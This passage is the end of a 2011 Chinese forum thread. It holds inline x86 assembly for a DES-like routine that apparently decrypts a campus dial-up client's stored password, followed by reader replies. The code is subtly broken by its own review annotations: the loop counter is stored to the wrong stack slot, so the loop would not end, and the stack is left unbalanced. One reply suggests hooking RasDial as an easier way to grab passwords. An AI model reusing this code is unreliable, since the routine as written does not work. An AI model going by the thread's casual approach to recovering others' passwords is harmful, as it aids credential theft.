        add esi, 4                      ; cursor advances 16 bytes per pass (four adds)
        shl eax, 0x1C                   ; eax = rotr(ecx, 4)
        shr edi, 4
        or eax, edi
        add esi, 4
        xor eax, ebx                    ; eax = rotr(ecx,4) ^ key word
        add esi, 4
        mov ebx, eax
        mov edi, eax
        shr ebx, 0x10                   ; 6-bit slices of eax index key3 / key1 / key5 / key7
        and ebx, 0x3F
        add esi, 4
        shr edi, 0x18
        push eax
        lea eax, key3
        mov ebp, dword ptr [ebx*4+eax]
        pop eax
        mov ebx, eax
        and edi, 0x3F
        and eax, 0x3F
        shr ebx, 8
        push eax
        lea eax, key1
        mov edi, dword ptr [edi*4+eax]
        pop eax
        and ebx, 0x3F
        or edi, ebp                     ; edi accumulates the four table words
        push eax
        lea eax, key5
        mov ebp, dword ptr [ebx*4+eax]
        pop eax
        push ecx
        lea ecx, key7
        mov ebx, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esi-4]      ; second key word (cursor+12) ^ ecx, unrotated
        or edi, ebp
        xor eax, ecx
        or edi, ebx
        mov ebx, eax
        mov ebp, eax
        shr ebx, 0x18                   ; slices index key2 / key4 / key6 / key8
        and ebx, 0x3F
        shr ebp, 0x10
        push eax
        lea eax, key2
        mov ebx, dword ptr [ebx*4+eax]
        pop eax
        and ebp, 0x3F
        push eax
        lea eax, key4
        or ebx, dword ptr [ebp*4+eax]
        pop eax
        mov ebp, eax
        shr ebp, 8
        and ebp, 0x3F
        and eax, 0x3F
        push eax
        lea eax, key6
        or ebx, dword ptr [ebp*4+eax]
        pop eax
        push ecx
        lea ecx, key8
        mov ebp, dword ptr [eax*4+ecx]
        pop ecx
        or ebx, ebp
        or ebx, edi
        xor edx, ebx                    ; edx ^= f(ecx)
        mov ebx, dword ptr [esi-8]      ; second round, roles swapped: key word at cursor+8
        mov eax, edx
        mov edi, edx
        shl eax, 0x1C                   ; eax = rotr(edx, 4) ^ key word
        shr edi, 4
        or eax, edi
        xor eax, ebx
        mov ebx, eax
        mov edi, eax
        shr ebx, 0x10
        and ebx, 0x3F
        shr edi, 0x18
        push ecx
        lea ecx, key3
        mov ebp, dword ptr [ebx*4+ecx]
        pop ecx
        mov ebx, eax
        and edi, 0x3F
        and eax, 0x3F
        shr ebx, 8
        push ecx
        lea ecx, key1
        mov edi, dword ptr [edi*4+ecx]
        pop ecx
        and ebx, 0x3F
        or edi, ebp
        push ecx
        lea ecx, key5
        mov ebp, dword ptr [ebx*4+ecx]
        lea ecx, key7
        mov ebx, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esi-4]      ; key word at cursor+12 ^ edx, unrotated
        or edi, ebp
        xor eax, edx
        or edi, ebx
        mov ebx, eax
        mov ebp, eax
        shr ebx, 0x18
        and ebx, 0x3F
        shr ebp, 0x10
        push ecx
        lea ecx, key2
        mov ebx, dword ptr [ebx*4+ecx]
        and ebp, 0x3F
        lea ecx, key4
        or ebx, dword ptr [ebp*4+ecx]
        mov ebp, eax
        and eax, 0x3F
        shr ebp, 8
        and ebp, 0x3F
        lea ecx, key6
        or ebx, dword ptr [ebp*4+ecx]
        lea ecx, key8
        mov ebp, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esp+0x10]   ; load loop counter
        or ebx, ebp
        or ebx, edi
        xor ecx, ebx                    ; ecx ^= f(edx)
        dec eax
        mov dword ptr [esp+10], eax     ; NOTE(review): decimal 10 here vs 0x10 at the load above --
                                        ; as written the counter is stored to a different slot than
                                        ; it is read from, so the loop would not terminate; confirm
                                        ; against the working build (0x10 is presumably intended)
        jnz L058
        mov eax, ecx                    ; undo the entry rotation: eax = rotr(ecx, 1)
        pop edi
        shl eax, 0x1F
        shr ecx, 1
        or eax, ecx
        mov ecx, eax
        xor ecx, edx                    ; inverse 0xAAAAAAAA step
        and ecx, 0xAAAAAAAA
        xor edx, ecx
        xor eax, ecx
        mov ecx, edx
        mov esi, eax
        shl ecx, 0x1F                   ; ecx = rotr(edx, 1)
        shr edx, 1
        or ecx, edx
        and esi, 0x0FF00FF              ; inverse 0x00FF00FF step
        mov edx, ecx
        shr edx, 8
        and edx, 0x0FF00FF
        xor edx, esi
        xor eax, edx
        shl edx, 8
        xor ecx, edx
        mov esi, eax
        mov edx, ecx
        and esi, 0x33333333             ; inverse 0x33333333 step
        shr edx, 2
        and edx, 0x33333333
        xor edx, esi
        xor eax, edx
        shl edx, 2
        xor ecx, edx
        mov edx, eax
        mov esi, ecx
        shr edx, 0x10                   ; inverse 16-bit swap
        and esi, 0x0FFFF
        xor edx, esi
        xor ecx, edx
        shl edx, 0x10
        xor eax, edx
        mov esi, ecx
        mov edx, eax
        and esi, 0x0F0F0F0F             ; inverse nibble swap
        shr edx, 4
        and edx, 0x0F0F0F0F
        xor edx, esi
        mov esi, edx
        shl esi, 4
        xor esi, eax
        mov eax, dword ptr [esp+0x14]   ; eax = &pass again (three pushes still on the stack)
        xor edx, ecx
        mov dword ptr [eax], esi        ; write the transformed block back into pass
        pop esi
        pop ebp
        mov dword ptr [eax+4], edx
        pop ebx
        pop ecx                         ; discards the counter slot; the two other pushes remain
    }
}



松下书童 2011-7-4 19:00
写的很详细,顶楼主,请教个很菜的问题,
0x1E, 0x30, 0x38, 0x3C, 0x1A, 0x09, 0x26, 0x0B, 0x19, 0x10, 0x3A, 0x3C, 0x1A, 0x38, 0x26, 0x0B,
0x21, 0x3D, 0x3A, 0x34, 0x11, 0x0C, 0x2E, 0x1A, 0x2F, 0x03, 0x32, 0x36, 0x22, 0x02, 0x2D, 0x1A,
这些数据怎样从十六进制编辑器中弄出来,还带逗号?
monsterok 3 2011-7-4 19:10
OD的插件。。可以导出的!!
tihty 3 2011-7-4 20:13
好文,虽然我不在浙江上大学,不过还是要感谢楼主..
ttgood 2011-7-4 20:24
好。牛。nnnn
dayang 2011-7-4 21:01
我怎么感觉象是转载的?
monsterok 3 2011-7-4 22:10
因为前面多了一个首发站么?
monsterok 3 2011-7-6 11:42
大大们能不能给个精呀、!1!生活所迫!!!
lofrank 2011-7-8 12:03
对楼主的能力表示佩服
不过还不如hook RasDial获得密码简单

另外,盗密码有什么意思,
有本事还不如分析分析下闪讯的用户名加密算法以及心跳机制,做个支持路由器的第三方拨号器造福大家
monsterok 3 2011-7-8 13:35
鄙人小菜鸟。。高水平的活做不来呀!!!
MagicFuzzX 2011-7-8 14:23
9.10楼都是杭电的
monsterok 3 2011-7-8 14:26
你也是杭电的?
MagicFuzzX 2011-7-8 14:30
当然了,两个大牛都在我QQ好友里面,当然我忘记退掉小号回复了
monsterok 3 2011-7-8 14:31
嘎嘎。。。报上名来。。。你是谁????